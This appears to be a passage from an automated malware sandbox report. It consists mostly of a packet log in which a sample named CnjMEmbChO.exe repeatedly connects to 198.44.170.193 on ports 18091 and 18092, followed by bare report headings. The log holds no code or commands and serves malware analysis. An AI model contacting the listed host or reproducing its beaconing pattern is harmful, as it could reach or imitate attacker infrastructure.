                                                          Dec 26, 2024 23:14:34.176314116 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176348925 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176379919 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176485062 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176485062 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176651955 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.485788107 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.485930920 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.485944033 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.485955000 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486016035 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486027002 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486036062 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486046076 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486146927 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.486182928 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486192942 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486208916 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486239910 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486249924 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486259937 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486269951 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486279964 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.486320972 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.486519098 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.486519098 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.487027884 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.487101078 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.487150908 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.487171888 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.487390995 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.487390995 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.488357067 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488369942 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488379955 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488389969 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488399982 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488670111 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488682985 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488692999 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488722086 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488742113 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488759041 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488941908 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488962889 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488976002 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488986015 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.488996029 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489006042 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489016056 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489025116 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489034891 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489043951 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489059925 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489059925 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489059925 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489059925 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489059925 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489176989 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489187956 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489197016 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489207983 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489392996 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489392996 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.489439011 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489449978 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489459038 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489483118 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489505053 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.489522934 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.490048885 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.490048885 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:35.520242929 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:35.823457003 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:35.823599100 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:37.504206896 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:40.681184053 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:40.681236029 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:40.985699892 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:40.987956047 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:40.988325119 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:41.340656996 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:51.500842094 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:51.804133892 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:51.834439993 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:52.191716909 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:07.122361898 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:07.425649881 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:07.450934887 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:07.803647041 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:22.743885040 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:23.047302008 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:23.082293034 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:23.435795069 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:38.365433931 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:38.668998957 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:38.698489904 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:39.052021980 CET1809149755198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:53.986932993 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:53.986932993 CET4975518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:55.924180984 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:15:56.230424881 CET1809249756198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:15:56.230704069 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:00.821902990 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:00.821949959 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:00.822002888 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:01.128464937 CET1809249756198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:01.128525019 CET1809249756198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:01.129818916 CET1809249756198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:01.130112886 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:01.487582922 CET1809249756198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:11.858086109 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:11.858086109 CET4975618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:13.795212984 CET4975718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:14.108357906 CET1809149757198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:14.108597040 CET4975718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:18.728938103 CET4975718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:19.042521954 CET1809149757198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:19.042583942 CET1809149757198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:19.044259071 CET1809149757198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:19.044644117 CET4975718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:19.407717943 CET1809149757198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:29.729126930 CET4975718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:29.729126930 CET4975718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:31.666412115 CET4975818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:31.966773033 CET1809249758198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:31.966958046 CET4975818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:36.567028046 CET4975818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:36.867403984 CET1809249758198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:36.869003057 CET1809249758198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:36.869355917 CET4975818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:37.220545053 CET1809249758198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:47.601371050 CET4975818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:47.601471901 CET4975818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:49.537482023 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:49.837316036 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:49.837527990 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:54.405395031 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:54.405419111 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:54.705462933 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:54.705665112 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:54.707186937 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:16:54.707544088 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:16:55.057185888 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:05.455678940 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:05.755275011 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:05.784801960 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:06.135421991 CET1809149759198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:21.077269077 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:21.077269077 CET4975918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:23.014569044 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:23.320729017 CET1809249760198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:23.320954084 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:27.882257938 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:27.882308006 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:27.882370949 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:28.189348936 CET1809249760198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:28.189380884 CET1809249760198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:28.190838099 CET1809249760198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:28.191116095 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:28.546958923 CET1809249760198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:38.948364019 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:38.948364019 CET4976018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:40.885556936 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:41.192162037 CET1809149761198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:41.192437887 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:45.778923988 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:45.779005051 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:46.085978985 CET1809149761198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:46.086021900 CET1809149761198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:46.087590933 CET1809149761198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:46.087893963 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:46.450959921 CET1809149761198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:56.819413900 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:56.819413900 CET4976118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:58.756617069 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:17:59.059367895 CET1809249762198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:17:59.059607029 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:03.679342985 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:03.679368973 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:03.982506037 CET1809249762198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:03.982712984 CET1809249762198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:03.983973980 CET1809249762198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:03.984282970 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:04.336827993 CET1809249762198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:14.690459013 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:14.690459013 CET4976218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:16.627718925 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:16.940900087 CET1809149763198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:16.941168070 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:21.558115005 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:21.558137894 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:21.871041059 CET1809149763198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:21.871229887 CET1809149763198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:21.872885942 CET1809149763198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:21.873264074 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:22.237265110 CET1809149763198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:32.561578989 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:32.561578989 CET4976318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:34.498836994 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:34.798984051 CET1809249764198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:34.799165010 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:39.397972107 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:39.397995949 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:39.698682070 CET1809249764198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:39.698692083 CET1809249764198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:39.701406956 CET1809249764198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:39.701663971 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:40.061682940 CET1809249764198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:50.416986942 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:50.416986942 CET4976418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:52.354480982 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:52.657689095 CET1809149765198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:52.657869101 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:57.225581884 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:57.225614071 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:57.529301882 CET1809149765198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:57.529313087 CET1809149765198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:57.531191111 CET1809149765198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:18:57.531546116 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:18:57.884392977 CET1809149765198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:08.304106951 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:08.304106951 CET4976518091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:10.241627932 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:10.547981024 CET1809249766198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:10.548415899 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:15.144787073 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:15.144871950 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:15.451529980 CET1809249766198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:15.453130007 CET1809249766198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:15.453450918 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:15.809783936 CET1809249766198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:26.206118107 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:26.206119061 CET4976618092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:28.143346071 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:28.449891090 CET1809149767198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:28.450047970 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:33.063534975 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:33.063621044 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:33.370347023 CET1809149767198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:33.370462894 CET1809149767198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:33.372328997 CET1809149767198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:33.372673988 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:33.729079962 CET1809149767198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:44.108439922 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:44.108484030 CET4976718091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:46.045646906 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:46.354836941 CET1809249768198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:46.355004072 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:51.026932955 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:51.027015924 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:51.336241007 CET1809249768198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:51.336363077 CET1809249768198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:51.338279963 CET1809249768198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:19:51.338640928 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:19:51.698021889 CET1809249768198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:02.010868073 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:02.010868073 CET4976818092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:03.948122025 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:04.257834911 CET1809149769198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:04.258147001 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:08.910914898 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:08.910995960 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:09.220915079 CET1809149769198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:09.221040964 CET1809149769198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:09.222805977 CET1809149769198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:09.223126888 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:09.583522081 CET1809149769198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:19.881799936 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:19.881799936 CET4976918091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:21.819137096 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:22.125590086 CET1809249770198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:22.125876904 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:26.734364986 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:26.734386921 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:27.041023970 CET1809249770198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:27.042714119 CET1809249770198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:27.043041945 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:27.400825024 CET1809249770198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:37.768574953 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:37.768574953 CET4977018092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:39.705836058 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:40.018548012 CET1809149771198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:40.018727064 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:44.690098047 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:44.690120935 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:45.003159046 CET1809149771198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:45.003256083 CET1809149771198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:45.005548954 CET1809149771198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:45.006047010 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:45.364682913 CET1809149771198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:55.639710903 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:55.639710903 CET4977118091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:57.576910973 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:20:57.886818886 CET1809249772198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:20:57.887087107 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:02.548391104 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:02.548419952 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:02.858342886 CET1809249772198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:02.858419895 CET1809249772198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:02.860008001 CET1809249772198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:02.860373974 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:03.220314026 CET1809249772198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:13.526400089 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:13.526400089 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:13.836406946 CET1809249772198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:13.836607933 CET4977218092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:15.463578939 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:15.776525974 CET1809149773198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:15.776838064 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:20.517293930 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:20.517318964 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:20.830255032 CET1809149773198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:20.831975937 CET1809149773198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:20.832304001 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:21.195132971 CET1809149773198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:31.428756952 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:31.428756952 CET4977318091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:33.365910053 CET4977418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:33.675343990 CET1809249774198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:33.675626040 CET4977418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:38.279228926 CET4977418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:38.279306889 CET4977418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:38.588860989 CET1809249774198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:38.588901997 CET1809249774198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:38.590301991 CET1809249774198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:21:38.590747118 CET4977418092192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:21:38.949450016 CET1809249774198.44.170.193192.168.11.20

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:17:13:12
                                                          Start date:26/12/2024
                                                          Path:C:\Users\user\Desktop\CnjMEmbChO.exe
                                                          Wow64 process (32bit):true
